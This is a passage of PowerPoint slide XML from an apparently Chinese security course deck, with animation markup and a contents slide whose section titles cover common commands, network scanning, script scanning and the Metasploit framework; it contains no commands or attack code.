                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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Text Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071996" y="2766621"/>
            <a:ext cx="3008380" cy="662379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="1565050"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="982844"/>
              <a:ext cx="1120898" cy="842780"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="2471202"/>
            <a:ext cx="1192345" cy="672217"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="平行四边形 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="2033848"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="3407000"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="平行四边形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="3084852"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596626" y="4316986"/>
            <a:ext cx="1192345" cy="677512"/>
            <a:chOff x="2215144" y="4047039"/>
            <a:chExt cx="1244730" cy="931598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="平行四边形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="4135856"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="1582798"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4615667" y="1005461"/>
              <a:ext cx="3228975" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="953426"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="2508336"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="平行四边形 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="1647579"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="组合 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="3433872"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="2341731"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644506" y="2450133"/>
              <a:ext cx="2827146" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>.3 脚本扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="平行四边形 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="2341731"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="组合 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5502297" y="4359409"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="3035884"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4623073" y="3097846"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="平行四边形 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="3035884"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
    </p:spTree>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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>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82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
